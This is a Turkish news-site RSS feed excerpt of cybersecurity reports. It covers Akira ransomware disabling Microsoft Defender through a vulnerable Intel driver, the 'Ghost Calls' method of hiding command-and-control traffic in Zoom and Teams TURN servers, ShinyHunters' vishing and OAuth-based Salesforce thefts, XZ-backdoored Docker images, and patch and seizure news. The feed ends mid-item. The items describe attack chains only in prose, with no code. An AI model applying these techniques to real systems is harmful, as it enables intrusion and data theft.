<guid>https://www.ajansexpres.com.tr/akira-fidye-yazilimi-intel-cpu-ayar-surucusunu-koetuye-kullanarak-microsoft-defenderi-devre-disi-birakiyor</guid>
<description><![CDATA[ Guidepoint Security’nin raporuna göre Akira fidye yazılımı, “rwdrv.sys” adlı meşru Intel CPU ayarlama sürücüsünü kullanarak çekirdek ayrıcalıkları elde ediyor ve ardından “hlpdrv.sys” adlı zararlı sürücüyle Microsoft Defender’ı kapatıyor. Saldırılar, 15 Temmuz 2025’ten bu yana artış gösterirken, uzmanlar BYOVD taktiğiyle yapılan bu saldırılara karşı uyarıda bulundu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccded05af.webp" length="33484" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:50 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Akira fidye yazılımı Microsoft Defender’ı nasıl devre dışı bırakıyor, saldırılarda hangi sürücüler kullanılıyor, SonicWall VPN saldırılarıyla nasıl bağlantılı, Akira fidye yazılımı hangi yöntemlerle yayılıyor</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="536" data-end="878"><strong data-start="536" data-end="587">Meşru sürücüyle güvenlik devre dışı bırakılıyor</strong><br data-start="587" data-end="590">Akira fidye yazılımı, ThrottleStop aracıyla kullanılan Intel sürücüsü “rwdrv.sys” üzerinden çekirdek seviyesinde erişim sağlıyor. Ardından “hlpdrv.sys” adlı kötü amaçlı sürücüyü yükleyerek Windows Defender’ın <em data-start="799" data-end="819">DisableAntiSpyware</em> ayarını değiştiriyor ve korumaları devre dışı bırakıyor.</p>
<p data-start="880" data-end="1182"><strong data-start="880" data-end="908">BYOVD tekniğiyle saldırı</strong><br data-start="908" data-end="911">Bu yöntem, “Bring Your Own Vulnerable Driver” (BYOVD) saldırı tekniğinin bir örneği. Yasal olarak imzalı ancak güvenlik açıkları bulunan sürücüler kullanılarak sistemde ayrıcalık yükseltiliyor. Akira’nın bu tekniği son haftalarda tekrarlayan saldırılarda sıkça görüldü.</p>
<p data-start="1184" data-end="1521"><strong data-start="1184" data-end="1225">SonicWall VPN saldırılarıyla bağlantı</strong><br data-start="1225" data-end="1228">Akira grubu kısa süre önce SonicWall SSLVPN servislerini de hedef aldı. Zero-day açık ihtimali gündeme gelse de, SonicWall henüz doğrulama yapmadı. Şirket, SSLVPN’in sınırlandırılması, MFA zorunluluğu, botnet/Geo-IP filtreleri ve kullanılmayan hesapların silinmesi gibi acil önlemler önerdi.</p>
<p data-start="1523" data-end="1897"><strong data-start="1523" data-end="1562">Sahte yazılım siteleriyle yayılıyor</strong><br data-start="1562" data-end="1565">The DFIR Report’a göre saldırılarda trojanlı MSI kurulum dosyaları kullanılıyor. “ManageEngine OpManager” gibi yazılımları arayan kullanıcılar, SEO zehirlemesi yoluyla opmanager[.]pro gibi sahte sitelere yönlendiriliyor. Bu sitelerden indirilen dosyalar, Bumblebee yükleyicisi aracılığıyla Akira’nın sisteme yerleşmesini sağlıyor.</p>
<p data-start="1899" data-end="2247"><strong data-start="1899" data-end="1926">Saldırıların ilerleyişi</strong><br data-start="1926" data-end="1929">Bumblebee, DLL yan yükleme yöntemiyle başlatılıyor, ardından AdaptixC2 ile kalıcı erişim sağlanıyor. Saldırganlar FileZilla üzerinden veri sızdırıyor, RustDesk ve SSH tünelleriyle kalıcılığı sürdürüyor. Ortalama 44 saat içinde “locker.exe” fidye yazılımı devreye giriyor ve etki alanlarındaki sistemler şifreleniyor.</p>
<p data-start="2249" data-end="2490"><strong data-start="2249" data-end="2270">Uzmanlardan uyarı</strong><br data-start="2270" data-end="2273">Güvenlik araştırmacıları, yalnızca resmi kaynaklardan yazılım indirilmesini, Akira ile ilgili IoC’lerin yakından takip edilmesini ve BYOVD tabanlı saldırılara karşı güvenlik çözümlerinin güncel tutulmasını öneriyor.</p>
<p data-start="2492" data-end="2719"><strong data-start="2492" data-end="2504"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Yeni “Ghost Calls” tekniği Zoom ve Teams sunucularını kötüye kullanarak gizli komuta&#45;kontrol iletişimi sağlıyor</title>
<link>https://www.ajansexpres.com.tr/yeni-ghost-calls-teknigi-zoom-ve-teams-sunucularini-koetuye-kullanarak-gizli-komuta-kontrol-iletisimi-sagliyor</link>
<guid>https://www.ajansexpres.com.tr/yeni-ghost-calls-teknigi-zoom-ve-teams-sunucularini-koetuye-kullanarak-gizli-komuta-kontrol-iletisimi-sagliyor</guid>
<description><![CDATA[ BlackHat USA’da tanıtılan “Ghost Calls” yöntemi, Zoom ve Microsoft Teams gibi uygulamalarda kullanılan TURN sunucularını istismar ederek saldırganların C2 trafiğini kurumsal video konferans trafiği gibi gizlemesine imkân tanıyor. Yöntem herhangi bir güvenlik açığı kullanmıyor, ancak WebRTC ve geçici kimlik bilgileri üzerinden savunma mekanizmalarını aşabiliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccd7f3f8f.webp" length="28568" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:43 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Ghost Calls tekniği nasıl çalışıyor, Zoom ve Teams bu tehditten nasıl etkileniyor, TURNt aracı ne işe yarıyor, Zoom bu yönteme karşı hangi önlemleri aldı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="535" data-end="857"><strong data-start="535" data-end="572">Görüşme trafiği kılıfında saldırı</strong><br data-start="572" data-end="575">Praetorian araştırmacısı Adam Crosser, “Ghost Calls” yöntemini BlackHat USA’da sundu. Bu teknik, Zoom ve Teams gibi konferans uygulamalarında kullanılan TURN protokolünü kullanarak saldırganların kurban sistem ile kendi altyapıları arasında WebRTC tüneli açmasına olanak sağlıyor.</p>
<p data-start="859" data-end="1255"><strong data-start="859" data-end="878">Nasıl çalışıyor</strong><br data-start="878" data-end="881">Bir kullanıcı Zoom ya da Teams toplantısına katıldığında, geçici TURN kimlik bilgileri alıyor. Ghost Calls, bu kimlik bilgilerini kötüye kullanarak saldırgan ile hedef sistem arasında şifrelenmiş bir WebRTC tüneli kuruyor. Bu tünel, saldırı trafiğini normal konferans trafiği gibi gösterdiği için güvenlik duvarları, proxy’ler ve TLS denetimleri tarafından fark edilmiyor.</p>
<p data-start="1257" data-end="1616"><strong data-start="1257" data-end="1277">Yeni araç: TURNt</strong><br data-start="1277" data-end="1280">Crosser, “TURNt” adlı açık kaynak bir araç geliştirdi. Bu araç, saldırgan tarafında bir Controller (SOCKS proxy sunucusu) ve kurban sistemde çalışan bir Relay bileşeninden oluşuyor. TURN sunucuları üzerinden C2 trafiğini tünelleyebilen TURNt, SOCKS proxying, port yönlendirme, veri sızdırma ve gizli VNC bağlantılarına imkân sağlıyor.</p>
<p data-start="1618" data-end="1925"><strong data-start="1618" data-end="1640">Zoom’dan ilk önlem</strong><br data-start="1640" data-end="1643">Zoom, BleepingComputer’a yaptığı açıklamada, Ghost Calls’a karşı TURN altyapısının yalnızca medya sunucularla eşleşmeye izin verecek şekilde güncellendiğini ve peer-to-peer bağlantıların engellendiğini duyurdu. Microsoft’un ek önlem planlarına dair ise henüz bir bilgi bulunmuyor.</p>
<p data-start="1927" data-end="2213"><strong data-start="1927" data-end="1945">Tehditin önemi</strong><br data-start="1945" data-end="1948">Ghost Calls, herhangi bir sıfır gün zafiyetine ihtiyaç duymadan, tamamen mevcut protokollerin doğasından yararlanıyor. Uzmanlara göre bu tür yöntemler, saldırganlara hem performans hem de anonimlik sağlıyor ve geleneksel C2 yöntemlerine göre daha gizli ilerliyor.</p>
<p data-start="2215" data-end="2387"><strong data-start="2215" data-end="2227"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Google, ShinyHunters grubunun Salesforce tabanlı veri hırsızlığı saldırısında müşteri verilerinin sızdırıldığını doğruladı</title>
<link>https://www.ajansexpres.com.tr/google-shinyhunters-grubunun-salesforce-tabanli-veri-hirsizligi-saldirisinda-musteri-verilerinin-sizdirildigini-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/google-shinyhunters-grubunun-salesforce-tabanli-veri-hirsizligi-saldirisinda-musteri-verilerinin-sizdirildigini-dogruladi</guid>
<description><![CDATA[ Google, Haziran 2025’te bir Salesforce CRM sisteminin ShinyHunters tarafından ele geçirildiğini ve küçük-orta ölçekli işletmelere ait iletişim bilgileri ile notların çalındığını açıkladı. Şirket, verilerin büyük ölçüde kamuya açık bilgilerden oluştuğunu belirtirken, saldırı hâlen diğer büyük markaları da hedef almaya devam ediyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccd333e25.webp" length="46450" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:39 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Google veri ihlalinde hangi bilgiler çalındı, saldırıyı hangi grup üstlendi, ShinyHunters şirketlerden nasıl fidye talep ediyor, bu kampanyada başka hangi firmalar etkilendi</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="515" data-end="795"><strong data-start="515" data-end="545">Google da saldırıya uğradı</strong><br data-start="545" data-end="548">Google, dün gece yaptığı güncellemede Haziran ayında şirketin bir Salesforce CRM örneğinin ShinyHunters tarafından hedef alındığını doğruladı. Saldırıda küçük ve orta ölçekli işletmelere ait iletişim bilgileri ve notların indirildiği belirtildi.</p>
<p data-start="797" data-end="1047"><strong data-start="797" data-end="838">Veriler sınırlı ama risk devam ediyor</strong><br data-start="838" data-end="841">Google’ın açıklamasına göre çalınan veriler esasen işletme adı ve iletişim bilgileri gibi büyük ölçüde kamuya açık bilgilerden oluşuyor. Ancak saldırı, müşteri güvenliği açısından dikkat çekici bulunuyor.</p>
<p data-start="1049" data-end="1358"><strong data-start="1049" data-end="1087">ShinyHunters kampanyası genişliyor</strong><br data-start="1087" data-end="1090">ShinyHunters, yıllardır Oracle Cloud, Snowflake, AT&T, Wattpad, MathWay gibi kurumlara yönelik saldırılarla biliniyor. Grup, son dönemde Adidas, Qantas, Allianz Life, Cisco, Louis Vuitton, Dior ve Tiffany & Co. gibi şirketlerin Salesforce sistemlerini de hedef aldı.</p>
<p data-start="1360" data-end="1790"><strong data-start="1360" data-end="1392">Vishing ve şantaj yöntemleri</strong><br data-start="1392" data-end="1395">Saldırılar, çalışanları hedef alan telefonla oltalama (vishing) teknikleriyle başlatılıyor. Grup, ele geçirdiği verileri kullanarak şirketlere e-posta yoluyla fidye talep ediyor. Şirketler ödeme yapmazsa verilerin sızdırılacağı tehdidinde bulunuyor. Bazı firmaların şimdiden ödeme yaptığı, bir şirketin verilerini sızdırmamak için yaklaşık 400 bin dolar değerinde Bitcoin gönderdiği öğrenildi.</p>
<p data-start="1792" data-end="2044"><strong data-start="1792" data-end="1815">Google’ın önlemleri</strong><br data-start="1815" data-end="1818">Google, saldırının ardından etki analizini tamamladığını ve gerekli güvenlik önlemlerini devreye aldığını açıkladı. Ancak ShinyHunters’ın saldırıları hâlen sürdüğü ve daha fazla büyük şirketin risk altında olduğu bildirildi.</p>
<p data-start="2046" data-end="2238"><strong data-start="2046" data-end="2058"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Allianz Life veri ihlali: 2,8 milyon müşteri ve iş ortağı kaydı hackerlar tarafından sızdırıldı</title>
<link>https://www.ajansexpres.com.tr/allianz-life-veri-ihlali-28-milyon-musteri-ve-is-ortagi-kaydi-hackerlar-tarafindan-sizdirildi</link>
<guid>https://www.ajansexpres.com.tr/allianz-life-veri-ihlali-28-milyon-musteri-ve-is-ortagi-kaydi-hackerlar-tarafindan-sizdirildi</guid>
<description><![CDATA[ ABD’nin önde gelen sigorta şirketlerinden Allianz Life’a ait Salesforce sistemlerinden çalınan veriler çevrim içi yayınlandı. ShinyHunters, Scattered Spider ve Lapsus$ bağlantılı hackerların üstlendiği saldırıda 2,8 milyon kayıtta isim, adres, telefon, doğum tarihi, vergi kimlik numarası ve finansal danışmanlık bilgileri gibi hassas veriler ifşa oldu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccceaedfc.webp" length="37850" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:34 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Allianz Life saldırısında kaç kayıt sızdırıldı, hangi bilgiler ifşa oldu, saldırganlar hangi yöntemle Salesforce’a erişim sağladı, ShinyHunters ve Scattered Spider arasında nasıl bir bağlantı var</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="509" data-end="829"><strong data-start="509" data-end="538">Veri sızıntısı doğrulandı</strong><br data-start="538" data-end="541">Allianz Life, Temmuz 2025’te CRM sistemlerinden büyük çaplı bir veri hırsızlığı yaşadığını açıklamıştı. Hafta sonu itibarıyla ShinyHunters grubu, çalınan “Accounts” ve “Contacts” veritabanı tablolarını internette yayımladı. Bu tablolar, 2,8 milyon müşteri ve iş ortağı kaydını içeriyor.</p>
<p data-start="831" data-end="1153"><strong data-start="831" data-end="858">Hangi veriler ifşa oldu</strong><br data-start="858" data-end="861">Sızdırılan dosyalarda kişisel bilgiler (isim, adres, telefon numarası, doğum tarihi, vergi kimlik numarası) ile mesleki bilgiler (lisanslar, kurum bağlantıları, ürün onayları ve pazarlama sınıflandırmaları) yer alıyor. BleepingComputer, verilerin doğruluğunu etkilenen kişilerle teyit etti.</p>
<p data-start="1155" data-end="1433"><strong data-start="1155" data-end="1177">Saldırının yöntemi</strong><br data-start="1177" data-end="1180">2025’in başında başlayan saldırı dalgasında tehdit aktörleri, çalışanları kandırarak şirketlerin Salesforce sistemlerine kötü amaçlı OAuth uygulamaları bağlatıyor. Bu bağlantılar üzerinden veritabanlarını indirip şirketlere fidye talebi gönderiyorlar.</p>
<p data-start="1435" data-end="1760"><strong data-start="1435" data-end="1467">Hacker gruplarının birleşimi</strong><br data-start="1467" data-end="1470">ShinyHunters, saldırının ardından yaptığı açıklamada Scattered Spider ile tek grup olduklarını duyurdu. Grup, daha önce Snowflake saldırısında da benzer yöntemlerle veri çalmıştı. Araştırmacılar, Lapsus$ grubunun eski üyelerinin de bu saldırılarda rol almış olabileceğini değerlendiriyor.</p>
<p data-start="1762" data-end="2000"><strong data-start="1762" data-end="1785">Allianz Life sessiz</strong><br data-start="1785" data-end="1788">Şirket, devam eden soruşturmayı gerekçe göstererek sızdırılan veriler hakkında yorum yapmadı. Ancak uzmanlar, ifşa edilen verilerin kimlik hırsızlığı ve dolandırıcılık risklerini artırdığı uyarısında bulunuyor.</p>
<p data-start="2002" data-end="2216"><strong data-start="2002" data-end="2014"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Docker Hub’da hâlâ XZ arka kapısı içeren onlarca Linux imajı indirilebilir durumda</title>
<link>https://www.ajansexpres.com.tr/docker-hubda-hala-xz-arka-kapisi-iceren-onlarca-linux-imaji-indirilebilir-durumda</link>
<guid>https://www.ajansexpres.com.tr/docker-hubda-hala-xz-arka-kapisi-iceren-onlarca-linux-imaji-indirilebilir-durumda</guid>
<description><![CDATA[ Mart 2024’te keşfedilen ve CVE-2024-3094 olarak izlenen XZ-Utils arka kapısı, araştırmacılara göre bugün hâlâ en az 35 Docker Hub imajında bulunuyor. Debian, güvenlik risklerine rağmen bu imajları kaldırmak yerine “tarihsel kayıt” amacıyla erişime açık bırakma kararı aldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccc9dde2c.webp" length="63666" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:29 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>XZ-Utils arka kapısı hangi Linux imajlarını etkiliyor, saldırgan bu açığı nasıl kullanabiliyor, Debian neden imajları kaldırmadı, kullanıcılar kendilerini nasıl koruyabilir</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="416" data-end="675"><strong data-start="416" data-end="449">Tehlike Docker Hub’da sürüyor</strong><br data-start="449" data-end="452">Binarly araştırmacıları, Docker Hub’da barındırılan en az 35 Linux imajında XZ-Utils arka kapısının hâlâ bulunduğunu tespit etti. Bu imajların bazıları, üzerinde inşa edilen yeni imajları da dolaylı olarak enfekte ediyor.</p>
<p data-start="677" data-end="1002"><strong data-start="677" data-end="707">XZ-Utils arka kapısı nedir</strong><br data-start="707" data-end="710">XZ-Utils sıkıştırma aracının 5.6.0 ve 5.6.1 sürümlerinde tespit edilen arka kapı, <code data-start="792" data-end="804">liblzma.so</code> kütüphanesine gizlenmişti. Kod, OpenSSH’deki <code data-start="850" data-end="870">RSA_public_decrypt</code> fonksiyonunu ele geçiriyor ve özel bir anahtara sahip saldırganın SSH üzerinden root yetkisiyle giriş yapmasına olanak tanıyordu.</p>
<p data-start="1004" data-end="1280"><strong data-start="1004" data-end="1034">Debian imajları kaldırmadı</strong><br data-start="1034" data-end="1037">Araştırmacıların uyarılarına rağmen Debian, 64 bitlik bazı imajları Docker Hub’dan çekmediğini doğruladı. Gerekçe olarak, istismarın düşük ihtimalle gerçekleşebileceği ve eski imajların “tarihsel arşiv” olarak korunması gerektiği belirtildi.</p>
<p data-start="1282" data-end="1483"><strong data-start="1282" data-end="1309">Risk halen devam ediyor</strong><br data-start="1309" data-end="1312">Binarly, bu yaklaşımın yanlış olduğunu ve bu imajların kamuya açık tutulmasının, otomatik yapılar veya yanlışlıkla indirmeler yoluyla ciddi risk oluşturduğunu vurguladı.</p>
<p data-start="1485" data-end="1724"><strong data-start="1485" data-end="1510">Kullanıcılara tavsiye</strong><br data-start="1510" data-end="1513">Uzmanlar, kullanılan imajların manuel olarak kontrol edilmesi ve XZ-Utils’in en az 5.6.2 sürümüne güncellenmiş olduğunun doğrulanması gerektiğini hatırlatıyor. En güncel sürüm 5.8.1 olarak yayımlanmış durumda.</p>
<p data-start="1726" data-end="1917"><strong data-start="1726" data-end="1738"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft Ağustos 2025 güvenlik güncellemeleri: 1 sıfır gün ve 107 güvenlik açığı kapatıldı</title>
<link>https://www.ajansexpres.com.tr/microsoft-agustos-2025-guvenlik-guncellemeleri-1-sifir-gun-ve-107-guvenlik-acigi-kapatildi</link>
<guid>https://www.ajansexpres.com.tr/microsoft-agustos-2025-guvenlik-guncellemeleri-1-sifir-gun-ve-107-guvenlik-acigi-kapatildi</guid>
<description><![CDATA[ Microsoft, Ağustos 2025 Patch Tuesday kapsamında 107 güvenlik açığına yönelik güncelleme yayımladı. Güncellemeler arasında, saldırganların domain yöneticisi yetkisi elde etmesine yol açabilecek Windows Kerberos sıfır gün açığı da yer alıyor. 13 kritik açık ise uzaktan kod çalıştırma ve yetki yükseltme riskleri taşıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccc5bbf50.webp" length="28732" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:25 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Microsoft’un Ağustos 2025 güncellemesinde kaç açık kapatıldı, hangi sıfır gün açığı giderildi, kritik RCE açıkları hangi ürünlerde bulundu, kullanıcılar hangi yamaları önceliklendirmeli</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="472" data-end="720"><strong data-start="472" data-end="511">Toplam 107 güvenlik açığı kapatıldı</strong><br data-start="511" data-end="514">Microsoft’un bu ay yayımladığı yama paketi 44 yetki yükseltme, 35 uzaktan kod yürütme, 18 bilgi ifşası, 4 hizmet reddi ve 9 sahtecilik açığını gideriyor. Bu açıkların 13’ü “kritik” olarak sınıflandırıldı.</p>
<p data-start="722" data-end="1022"><strong data-start="722" data-end="753">Kerberos’ta sıfır gün açığı</strong><br data-start="753" data-end="756">En dikkat çekici güncelleme, CVE-2025-53779 kodlu Windows Kerberos açığı oldu. Bu açık, doğrulanmış bir saldırganın domain yöneticisi ayrıcalıkları elde etmesine imkân tanıyor. Açığın teknik detayları Mayıs 2025’te Akamai’den Yuval Gordon tarafından yayımlanmıştı.</p>
<p data-start="1024" data-end="1368"><strong data-start="1024" data-end="1063">Kritik uzaktan kod yürütme açıkları</strong><br data-start="1063" data-end="1066">Düzeltmeler arasında Microsoft Office (Word, Excel, PowerPoint, Visio), SharePoint, SQL Server, Windows GDI+ ve Message Queuing bileşenlerinde kritik seviyede RCE açıkları da bulunuyor. Bu açıklar, saldırganların kullanıcı etkileşimi olmadan sistem üzerinde zararlı kod çalıştırmasına yol açabiliyor.</p>
<p data-start="1370" data-end="1399"><strong data-start="1370" data-end="1397">Öne çıkan diğer yamalar</strong></p>
<ul data-start="1400" data-end="1701">
<li data-start="1400" data-end="1529">
<p data-start="1402" data-end="1529"><strong data-start="1402" data-end="1422">Exchange Server:</strong> CVE-2025-53786, hibrit kurulumlarda bulut ortamına yetkisiz erişim sağlayabilecek yetki yükseltme açığı.</p>
</li>
<li data-start="1530" data-end="1584">
<p data-start="1532" data-end="1584"><strong data-start="1532" data-end="1549">Windows NTLM:</strong> Kritik yetki yükseltme zafiyeti.</p>
</li>
<li data-start="1585" data-end="1646">
<p data-start="1587" data-end="1646"><strong data-start="1587" data-end="1599">Hyper-V:</strong> Hem DoS hem de uzaktan kod yürütme açıkları.</p>
</li>
<li data-start="1647" data-end="1701">
<p data-start="1649" data-end="1701"><strong data-start="1649" data-end="1669">Microsoft Teams:</strong> Uzaktan kod çalıştırma açığı.</p>
</li>
</ul>
<p data-start="1703" data-end="1983"><strong data-start="1703" data-end="1740">Diğer üretici yamalarıyla paralel</strong><br data-start="1740" data-end="1743">Ağustos güncellemeleri, son haftalarda diğer üreticilerden gelen yamaları da takip ediyor. 7-Zip, Adobe, Cisco, Fortinet, Google (Android), SAP ve Trend Micro da aktif olarak istismar edilen açıklar için güvenlik güncellemeleri yayımladı.</p>
<p data-start="1985" data-end="2214"><strong data-start="1985" data-end="2006">Uzmanlardan öneri</strong><br data-start="2006" data-end="2009">Siber güvenlik uzmanları, özellikle Kerberos açığı ve Office ürünlerindeki RCE açıklarının kurumlar için ciddi risk oluşturduğunu belirterek güncellemelerin gecikmeden uygulanması gerektiğini vurguluyor.</p>
<p data-start="2216" data-end="2420"><strong data-start="2216" data-end="2228"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ABD, BlackSuit fidye yazılımı çetesinden 1 milyon dolarlık kripto varlığı ele geçirdi</title>
<link>https://www.ajansexpres.com.tr/abd-blacksuit-fidye-yazilimi-cetesinden-1-milyon-dolarlik-kripto-varligi-ele-gecirdi</link>
<guid>https://www.ajansexpres.com.tr/abd-blacksuit-fidye-yazilimi-cetesinden-1-milyon-dolarlik-kripto-varligi-ele-gecirdi</guid>
<description><![CDATA[ ABD Adalet Bakanlığı, BlackSuit fidye yazılımı grubuna yapılan fidye ödemesinden kaynaklanan 1 milyon doların üzerinde kripto varlığı ele geçirdiğini duyurdu. Operasyon, grubun karanlık ağ üzerindeki gasp portallarının kapatıldığı “Operation Checkmate” hamlesinin ardından geldi. BlackSuit ve Royal çetelerinin 2022’den bu yana 450’den fazla ABD kuruluşunu hedef alarak 370 milyon doların üzerinde fidye kazancı sağladığı biliniyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccc180031.webp" length="39424" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:21 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>BlackSuit çetesinden ele geçirilen kripto para hangi fidye ödemesinden kaynaklanıyor, Operation Checkmate kapsamında hangi adımlar atıldı, Royal ve BlackSuit bugüne kadar kaç saldırı gerçekleştirdi, suçtan elde edilen gelirlere el koymanın önemi nedir</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="578" data-end="956"><strong data-start="578" data-end="619">1 milyon dolarlık kriptoya el konuldu</strong><br data-start="619" data-end="622">ABD Adalet Bakanlığı, BlackSuit fidye yazılımı grubuna ait dijital varlıkların 9 Ocak 2024’te ele geçirildiğini açıkladı. Söz konusu varlıkların değeri 1.091.453 dolar olarak açıklandı. Kripto paralar, suçlular tarafından farklı borsalar üzerinden defalarca transfer edilerek izleri gizlenmeye çalışılırken tespit edilip donduruldu.</p>
<p data-start="958" data-end="1185"><strong data-start="958" data-end="993">Fidye ödemesinden kaynaklanıyor</strong><br data-start="993" data-end="996">Yetkililere göre el konulan varlıklar, 4 Nisan 2023’te fidye ödemesi yapan bir kurbanın gönderdiği 49,3 Bitcoin’den elde edildi. O dönemde bu ödemenin değeri yaklaşık 1,44 milyon dolardı.</p>
<p data-start="1187" data-end="1466"><strong data-start="1187" data-end="1225">Operation Checkmate ile bağlantılı</strong><br data-start="1225" data-end="1228">Bu duyuru, uluslararası “Operation Checkmate” operasyonu kapsamında BlackSuit’in gasp sitelerinin ele geçirilmesinin ardından geldi. Operasyon, BlackSuit ile bağlantılı Royal, Quantum ve Chaos fidye yazılım platformlarını da hedef aldı.</p>
<p data-start="1468" data-end="1774"><strong data-start="1468" data-end="1503">ABD’de 450 kuruluşa saldırdılar</strong><br data-start="1503" data-end="1506">Geçen hafta ABD İç Güvenlik Bakanlığı, Royal ve BlackSuit çetelerinin sağlık, eğitim, enerji, kamu güvenliği ve devlet kurumları dahil 450’den fazla ABD kuruluşunu hedef aldığını açıkladı. Bu saldırılardan toplam 370 milyon dolar değerinde fidye ödemesi elde edildi.</p>
<p data-start="1776" data-end="1964"><strong data-start="1776" data-end="1816">Daha önce 20 Bitcoin’e el konulmuştu</strong><br data-start="1816" data-end="1819">28 Temmuz’da FBI Dallas, Chaos fidye yazılımı grubuyla bağlantılı bir adreste 20 Bitcoin’e (yaklaşık 2,4 milyon dolar) el koyduğunu duyurmuştu.</p>
<p data-start="1966" data-end="2212"><strong data-start="1966" data-end="1997">Stratejik öneme sahip hamle</strong><br data-start="1997" data-end="2000">Adalet Bakanlığı, suçtan elde edilen gelirlerin ele geçirilmesinin, yakalanamayan operatörlerin finansal gücünü kırmak ve altyapılarını yeniden kurmalarını engellemek için kritik öneme sahip olduğunu vurguladı.</p>
<p data-start="2214" data-end="2484"><strong data-start="2214" data-end="2226"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Android’in pKVM hipervizörü, en yüksek güvenlik seviyesi olan SESIP Level 5 sertifikasını aldı</title>
<link>https://www.ajansexpres.com.tr/androidin-pkvm-hipervizoeru-en-yuksek-guvenlik-seviyesi-olan-sesip-level-5-sertifikasini-aldi</link>
<guid>https://www.ajansexpres.com.tr/androidin-pkvm-hipervizoeru-en-yuksek-guvenlik-seviyesi-olan-sesip-level-5-sertifikasini-aldi</guid>
<description><![CDATA[ Google, Android Virtualization Framework’ün temelini oluşturan korumalı KVM (pKVM) hipervizörünün SESIP Level 5 sertifikası kazandığını açıkladı. Bu sertifika, pKVM’yi tüketici elektroniğinde geniş ölçekli dağıtım için en yüksek güvenlik standardını karşılayan ilk yazılım güvenlik sistemi haline getirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5ccbd3b6db.webp" length="38050" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:25:17 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>pKVM hipervizörü hangi güvenlik sertifikasını aldı, SESIP Level 5 kullanıcılar için ne anlama geliyor, pKVM Android cihazlarda hangi görevlerde kullanılıyor, Google bu gelişmeyi neden kritik görüyor</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="460" data-end="730"><strong data-start="460" data-end="492">En yüksek güvenlik standardı</strong><br data-start="492" data-end="495">pKVM, Android cihazlarda sanallaştırma çerçevesinin çekirdeğini oluşturan hipervizör. Google, sistemin DEKRA tarafından akredite laboratuvarlarda test edildiğini ve gelişmiş tehditlere karşı dirençli olduğunun doğrulandığını duyurdu.</p>
<p data-start="732" data-end="1060"><strong data-start="732" data-end="755">SESIP Level 5 nedir</strong><br data-start="755" data-end="758">SESIP (Security Evaluation Standard for IoT Platforms), IoT ve mobil platformlar için geliştirilen bir güvenlik standardı. Level 5, Common Criteria’nin (ISO 15408) en yüksek güvenlik seviyesi olan AVA_VAN.5’e eşdeğer. Bu seviye, pKVM’nin sofistike saldırılara karşı dayanıklı olduğunu ortaya koyuyor.</p>
<p data-start="1062" data-end="1205"><strong data-start="1062" data-end="1092">pKVM’nin kullanım alanları</strong><br data-start="1092" data-end="1095">Hipervizör, Android cihazlarda kritik görevlerin güvenli şekilde çalıştırılmasını sağlıyor. Bunlar arasında:</p>
<ul data-start="1206" data-end="1447">
<li data-start="1206" data-end="1291">
<p data-start="1208" data-end="1291">Google’ın Gemini Nano gibi yapay zekâ modellerinin cihaz üzerinde çalıştırılması,</p>
</li>
<li data-start="1292" data-end="1342">
<p data-start="1294" data-end="1342">biyometrik kimlik doğrulama (yüz, parmak izi),</p>
</li>
<li data-start="1343" data-end="1382">
<p data-start="1345" data-end="1382">DRM korumalı içeriklerin işlenmesi,</p>
</li>
